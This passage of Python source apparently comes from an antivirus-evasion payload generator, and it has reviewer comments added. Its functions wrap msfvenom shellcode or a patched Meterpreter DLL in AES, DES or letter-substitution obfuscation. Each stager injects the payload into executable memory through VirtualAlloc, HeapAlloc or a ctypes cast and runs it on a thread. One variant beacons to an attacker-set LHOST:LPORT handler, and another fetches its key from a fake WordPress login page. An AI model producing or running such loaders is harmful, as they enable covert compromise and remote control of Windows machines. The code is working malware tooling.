            html_data = """ <!DOCTYPE html> <!--[if IE 8]> <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"> <![endif]--> <!--[if !(IE 8) ]><!--> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head> <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post"> <p> <label for="user_login">Username<br> <input name="log" id="user_login" class="input" size="20" type="text"></label> </p> <p> <label for="user_pass">Password<br> <input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label> </p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p> <p class="submit"> <input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit"> <input name="redirect_to" value="http://www.google.com" type="hidden"> <input name="testcookie" value="1" type="hidden"> </p> </form> <p id="nav"> <a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a> </p> <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p> </div> <div class="clear"></div> </body></html> """
            html_data += '<!--'+ RandHttpstring +'-->'
            html_data = str(html_data)
            f.write(html_data)
            f.close()
            # encrypt the shellcode and grab the randomized key
            (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
            # Create Payload code
            PayloadCode = 'from ctypes import *\n'
            PayloadCode += 'from Crypto.Cipher import AES\n'
            PayloadCode += 'import base64\n'
            PayloadCode += 'import os\n'
            PayloadCode += 'import time\n'
            PayloadCode += 'import md5\n'
            PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            # Define Target Server "Key hosting server"
            PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
            PayloadCode += 'while True:\n'
            PayloadCode += ' try:\n'
            # Open Target Server with HTTP GET request
            PayloadCode += ' ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
            # Check to see if server returns a 200 code or if not its most likely a 400 code
            PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
            # Opening and requesting HTML from Target Server
            PayloadCode += ' '+ RandHttpKey + ' = urlopen('+ RandKeyServer +').read()\n'
            PayloadCode += ' '+ RandMD5 +' = md5.new()\n'
            PayloadCode += ' '+ RandHttpKey + ' = str(' + RandHttpKey + ')\n'
            # Genrate MD5 hash of HTML on page
            PayloadCode += ' '+ RandMD5 +'.update('+ RandHttpKey +')\n'
            # Convert to 16 Byte Hex for AES functions
            PayloadCode += ' '+ RandHttpKey + ' = '+ RandMD5 +'.hexdigest()\n'
            # Convert to String for functions
            PayloadCode += ' '+ RandHttpKey + ' = str('+ RandHttpKey +')\n'
            # Break out to decryption
            PayloadCode += ' break\n'
            # At any point it fails you will be in sleep for supplied time
            PayloadCode += ' except URLError, e:\n'
            # SLEEP_TIME is spliced into the generated source verbatim; it is not validated as a number.
            PayloadCode += ' time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
            PayloadCode += ' pass\n'
            PayloadCode += RandPadding + ' = \'{\'\n'
            PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
            # NOTE(review): as in the "heap" branch, the embedded `secret` is the
            # key; the fetched RandHttpKey is never used.
            PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
            PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
            # Here the decoded value stays a str (no bytearray) because it feeds create_string_buffer.
            PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
            PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
def generate(self):
    """Build the Python stager source for the DES-CFB variant.

    Reads inject_method, expire_payload and use_pyherion from
    ``self.required_options`` (each value taken with ``[0]``) and
    dispatches on inject_method ("virtual", "heap", anything else) and on
    whether expire_payload is "x" (no expiry) or a number of days.  The
    shellcode is encrypted with ``encryption.encryptDES`` and the key and
    IV are embedded in the generated script as string literals.

    Returns the generated source as a str.  Every branch returns, so the
    method never falls through.

    NOTE(review): ``int(self.required_options["expire_payload"][0])``
    raises ValueError for any non-numeric value other than "x"; and
    ``.encode("string_escape")`` is Python 2 only.
    """
    if self.required_options["inject_method"][0].lower() == "virtual":
        if self.required_options["expire_payload"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
            # Create Payload File
            PayloadCode = "from Crypto.Cipher import DES\n"
            PayloadCode += "import ctypes as avlol\n"
            # Key and IV are written into the script verbatim; they must not
            # contain a single quote or the generated source will not parse.
            PayloadCode += RandIV + " = '" + iv + "'\n"
            PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
            PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
            PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
            PayloadCode += ( ShellcodeVariableName + " = bytearray(" + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape'))\n" )
            PayloadCode += ( RandPtr + " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(" + ShellcodeVariableName + ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n" )
            PayloadCode += ( RandBuf + " = (avlol.c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" )
            PayloadCode += ( "avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(" + RandPtr + ")," + RandBuf + ",avlol.c_int(len(" + ShellcodeVariableName + ")))\n" )
            PayloadCode += ( RandHt + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(" + RandPtr + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n" )
            PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
            # Create Payload File
            PayloadCode = "from Crypto.Cipher import DES\n"
            PayloadCode += "import ctypes as avlol\n"
            PayloadCode += "from datetime import datetime\n"
            PayloadCode += "from datetime import date\n\n"
            PayloadCode += RandToday + " = datetime.now()\n"
            # expiredate is "YYYY-MM-DD"; [2:] drops the century to match the "%y-%m-%d" format.
            # The expiry is only a comparison against the local clock of the host running the script.
            PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
            PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
            PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
            PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
            PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
            PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
            PayloadCode += ( "\t" + ShellcodeVariableName + " = bytearray(" + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape'))\n" )
            PayloadCode += ( "\t" + RandPtr + " = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(" + ShellcodeVariableName + ")),avlol.c_int(0x3000),avlol.c_int(0x40))\n" )
            PayloadCode += ( "\t" + RandBuf + " = (avlol.c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" )
            PayloadCode += ( "\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(" + RandPtr + ")," + RandBuf + ",avlol.c_int(len(" + ShellcodeVariableName + ")))\n" )
            PayloadCode += ( "\t" + RandHt + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(" + RandPtr + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n" )
            PayloadCode += ( "\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))" )
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
    # NOTE(review): plain `if`, not `elif`; equivalent only because every
    # path of the "virtual" branch above returns.
    if self.required_options["inject_method"][0].lower() == "heap":
        if self.required_options["expire_payload"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            HeapVar = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
            # Create Payload File
            PayloadCode = "from Crypto.Cipher import DES\n"
            PayloadCode += "import ctypes as avlol\n"
            PayloadCode += RandIV + " = '" + iv + "'\n"
            PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
            PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
            PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
            PayloadCode += ( ShellcodeVariableName + " = bytearray(" + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape'))\n" )
            PayloadCode += ( HeapVar + " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(" + ShellcodeVariableName + ") * 2),avlol.c_int(0))\n" )
            PayloadCode += ( RandPtr + " = avlol.windll.kernel32.HeapAlloc(avlol.c_int(" + HeapVar + "),avlol.c_int(0x00000008),avlol.c_int(len( " + ShellcodeVariableName + ")))\n" )
            PayloadCode += ( RandBuf + " = (avlol.c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" )
            PayloadCode += ( "avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(" + RandPtr + ")," + RandBuf + ",avlol.c_int(len(" + ShellcodeVariableName + ")))\n" )
            PayloadCode += ( RandHt + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(" + RandPtr + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n" )
            PayloadCode += "avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))"
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            HeapVar = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
            # Create Payload File
            PayloadCode = "from Crypto.Cipher import DES\n"
            PayloadCode += "import ctypes as avlol\n"
            PayloadCode += "from datetime import datetime\n"
            PayloadCode += "from datetime import date\n\n"
            PayloadCode += RandToday + " = datetime.now()\n"
            # Same two-digit-year expiry comparison as the "virtual" date branch.
            PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
            PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
            PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
            PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
            PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
            PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
            PayloadCode += ( "\t" + ShellcodeVariableName + " = bytearray(" + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape'))\n" )
            PayloadCode += ( "\t" + HeapVar + " = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(" + ShellcodeVariableName + ") * 2),avlol.c_int(0))\n" )
            PayloadCode += ( "\t" + RandPtr + " = avlol.windll.kernel32.HeapAlloc(avlol.c_int(" + HeapVar + "),avlol.c_int(0x00000008),avlol.c_int(len( " + ShellcodeVariableName + ")))\n" )
            PayloadCode += ( "\t" + RandBuf + " = (avlol.c_char * len(" + ShellcodeVariableName + ")).from_buffer(" + ShellcodeVariableName + ")\n" )
            PayloadCode += ( "\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(" + RandPtr + ")," + RandBuf + ",avlol.c_int(len(" + ShellcodeVariableName + ")))\n" )
            PayloadCode += ( "\t" + RandHt + " = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(" + RandPtr + "),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n" )
            PayloadCode += ( "\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(" + RandHt + "),avlol.c_int(-1))" )
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
    else:
        if self.required_options["expire_payload"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()  # unused in this branch
            RandBuf = helpers.randomString()  # unused in this branch
            RandHt = helpers.randomString()  # unused in this branch
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()  # unused
            RandMemoryShell = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
            # Create Payload File
            PayloadCode = "from Crypto.Cipher import DES\n"
            PayloadCode += "from ctypes import *\n"
            PayloadCode += RandIV + " = '" + iv + "'\n"
            PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
            PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
            PayloadCode += RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
            # Decrypted value stays a str here (no bytearray) because it feeds create_string_buffer.
            PayloadCode += ( ShellcodeVariableName + " = " + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape')\n" )
            PayloadCode += ( RandMemoryShell + " = create_string_buffer(" + ShellcodeVariableName + ", len(" + ShellcodeVariableName + "))\n" )
            PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
            PayloadCode += RandShellcode + "()"
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()  # unused in this branch
            RandBuf = helpers.randomString()  # unused in this branch
            RandHt = helpers.randomString()  # unused in this branch
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandDESKey = helpers.randomString()
            RandDESPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()  # unused
            RandMemoryShell = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
            # Create Payload File
            PayloadCode = "from Crypto.Cipher import DES\n"
            PayloadCode += "from ctypes import *\n"
            PayloadCode += "from datetime import datetime\n"
            PayloadCode += "from datetime import date\n\n"
            PayloadCode += RandToday + " = datetime.now()\n"
            # Same two-digit-year expiry comparison as the other date branches.
            PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
            PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
            PayloadCode += "\t" + RandIV + " = '" + iv + "'\n"
            PayloadCode += "\t" + RandDESKey + " = '" + DESKey + "'\n"
            PayloadCode += "\t" + RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
            PayloadCode += "\t" + RandEncShellCodePayload + " = '" + EncShellCode.encode("string_escape") + "'\n"
            PayloadCode += ( "\t" + ShellcodeVariableName + " = " + RandDESPayload + ".decrypt(" + RandEncShellCodePayload + ").decode('string_escape')\n" )
            PayloadCode += ( "\t" + RandMemoryShell + " = create_string_buffer(" + ShellcodeVariableName + ", len(" + ShellcodeVariableName + "))\n" )
            PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
            PayloadCode += "\t" + RandShellcode + "()"
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
def generate(self):
    """Build a Python loader around a patched copy of Metasploit's metsrv.x86.dll.

    Locates the DLL under ``settings.METASPLOIT_PATH`` (a single hard-coded
    gem path, so any other Metasploit layout fails the check), patches a
    few in-place string/integer fields with ``dllReplace``, then deflates
    the result via ``helpers.deflate`` and embeds it in the generated
    source.  Reads LHOST, LPORT, inject_method and use_pyherion from
    ``self.required_options``.

    Returns the generated source as a str.  Calls ``sys.exit()`` (does not
    raise) when the DLL is not found.

    NOTE(review): each ``meterpreterDll.index(...)`` raises ValueError if
    its marker is absent (e.g. a different DLL build); nothing catches it.
    """
    if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
        metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
    else:
        print "[*] Error: You either do not have the latest version of Metasploit or"
        print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
        print "[*] Error: Please fix either issue then select this payload again!"
        sys.exit()
    # NOTE(review): not a `with` block; the handle is not closed if read() raises.
    f = open(metsrvPath, 'rb')
    meterpreterDll = f.read()
    f.close()
    # lambda function used for patching the metsvc.dll
    # Overwrites exactly len(s) bytes at offset ind, so each replacement must
    # fit inside the field it replaces or it clobbers whatever follows.
    dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
    # patch the metsrv.dll header
    headerPatch = helpers.selfcontained_patch()
    meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
    # patch in the default user agent string
    userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
    userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
    meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
    # turn off SSL
    sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
    sslString = "METERPRETER_TRANSPORT_HTTP\x00"
    meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
    # replace the URL/port of the handler
    # The placeholder field is "https://" + 256 X's; the new URL is written
    # over its start and NUL-terminated.  self.genHTTPChecksum() is defined
    # elsewhere in the class (not visible here).
    urlIndex = meterpreterDll.index("https://" + ("X" * 256))
    urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
    meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
    # replace the expiration timeout marker (0xb64be661) with 604800 seconds (7 days)
    # (the original comment said 300; that value is the communication timeout below)
    expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
    expirationTimeout = struct.pack('<I', 604800)
    meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
    # replace the communication timeout marker (0xaf79257f) with the default value of 300
    communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
    communicationTimeout = struct.pack('<I', 300)
    meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
    # compress/base64 encode the dll
    # compressedDll is spliced into a double-quoted string literal below, so
    # helpers.deflate's output is presumably base64 text -- confirm.
    compressedDll = helpers.deflate(meterpreterDll)
    # actually build out the payload
    payloadCode = ""
    # traditional void pointer injection
    if self.required_options["inject_method"][0].lower() == "void":
        # doing void * cast
        payloadCode += "from ctypes import *\nimport base64,zlib\n"
        randInflateFuncName = helpers.randomString()
        randb64stringName = helpers.randomString()
        randVarName = helpers.randomString()
        # deflate function
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
        # randVarName is deliberately re-drawn: the first value was the
        # inflate helper's local, this one is the module-level variable.
        randVarName = helpers.randomString()
        randFuncName = helpers.randomString()
        payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
        payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
        payloadCode += randFuncName+"()\n"
    # VirtualAlloc() injection
    else:
        payloadCode += 'import ctypes,base64,zlib\n'
        randInflateFuncName = helpers.randomString()
        randb64stringName = helpers.randomString()
        randVarName = helpers.randomString()
        randPtr = helpers.randomString()
        randBuf = helpers.randomString()
        randHt = helpers.randomString()
        # deflate function
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
        # NOTE(review): unlike the "void" branch, randVarName is reused here
        # for both the helper's local and the module-level variable; harmless
        # because the scopes differ, but inconsistent.
        payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
        payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
        payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
        payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        payloadCode = encryption.pyherion(payloadCode)
    return payloadCode
def generate(self) -> str:
    """Build a Python 2 loader for msfvenom shellcode, lightly obfuscated by letter substitution.

    The shellcode is rendered as a ``string_escape`` literal; one hex digit (a-f)
    in that text is swapped for a random non-hex letter, and the generated loader
    swaps it back with ``maketrans`` before decoding.  ``INJECT_METHOD`` selects the
    execution style (``virtual`` -> VirtualAlloc/CreateThread, ``heap`` ->
    HeapCreate/HeapAlloc/CreateThread, anything else -> ctypes function-pointer
    cast); each style has a plain variant and a date-gated variant chosen by
    ``EXPIRE_PAYLOAD`` (``x`` = never expires, otherwise a number of days).

    Both this generator and the emitted loader are Python 2 only
    (``string.maketrans`` on ``str``, the ``string_escape`` codec).

    Returns:
        The loader source as a string, wrapped by ``encryption.pyherion`` when
        ``USE_PYHERION`` is ``y``.

    Raises:
        ValueError: ``EXPIRE_PAYLOAD`` is neither ``x`` nor an integer -- ``int()``
        is applied to it without any validation.

    Security notes (reviewer):
      * The letter swap is a one-character substitution, not encryption; it only
        changes how the literal looks on disk.
      * Every branch executes from RWX memory: PAGE_EXECUTE_READWRITE (0x40) via
        VirtualAlloc, or a HEAP_CREATE_ENABLE_EXECUTE (0x00040000) heap.  The
        ``else`` branch casts a ctypes string buffer straight to a function pointer
        with no protection change at all.
      * The expiry gate compares ``datetime.now()`` on the target against a
        two-digit-year date baked into the file, so it is defeated by changing the
        target's clock.
    """
    #Random letter substition variables
    hex_letters = "abcdef"
    non_hex_letters = "ghijklmnopqrstuvwxyz"
    # one hex digit is replaced by one non-hex letter; the loader reverses it
    encode_with_this = random.choice(hex_letters)
    decode_with_this = random.choice(non_hex_letters)
    # Generate Shellcode Using msfvenom
    Shellcode = self.shellcode.generate(self.required_options)
    # Generate Random Variable Names
    subbed_shellcode_variable_name = helpers.randomString()
    shellcode_variable_name = helpers.randomString()
    rand_ptr = helpers.randomString()
    rand_buf = helpers.randomString()
    rand_ht = helpers.randomString()
    rand_decoded_letter = helpers.randomString()
    rand_correct_letter = helpers.randomString()
    rand_sub_scheme = helpers.randomString()
    # Create Letter Substitution Scheme
    # NOTE(review): the loader's reverse map (non-hex letter -> hex digit) rewrites
    # *every* occurrence of that non-hex letter. If the escaped shellcode text
    # already contains it (a printable byte that string_escape leaves as a literal
    # letter), that byte is corrupted at load time -- confirm the escaped form is
    # free of the chosen letter, or restrict the scheme to the \x hex digits.
    sub_scheme = string.maketrans(encode_with_this, decode_with_this)
    # Escaping Shellcode
    # assumes self.shellcode.generate() returns raw bytes here; other generators
    # in this file embed its result directly as a literal -- TODO confirm
    Shellcode = Shellcode.encode("string_escape")
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            # Create Payload File
            payload_code = 'import ctypes as avlol\n'
            payload_code += 'from string import maketrans\n'
            # the substituted letter and its original, plus the reverse translation table
            payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
            # the substituted (forward-translated) escaped shellcode literal
            payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            # MEM_COMMIT|MEM_RESERVE (0x3000), PAGE_EXECUTE_READWRITE (0x40): RWX private memory
            payload_code += rand_ptr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len(' + shellcode_variable_name + ')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
            payload_code += rand_buf + ' = (avlol.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
            payload_code += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + rand_ptr + '),' + rand_buf + ',avlol.c_int(len(' + shellcode_variable_name + ')))\n'
            # run the buffer on a new thread and block until it returns (INFINITE = -1)
            payload_code += rand_ht + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + rand_ptr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            payload_code += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + rand_ht + '),avlol.c_int(-1))\n'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
        else:
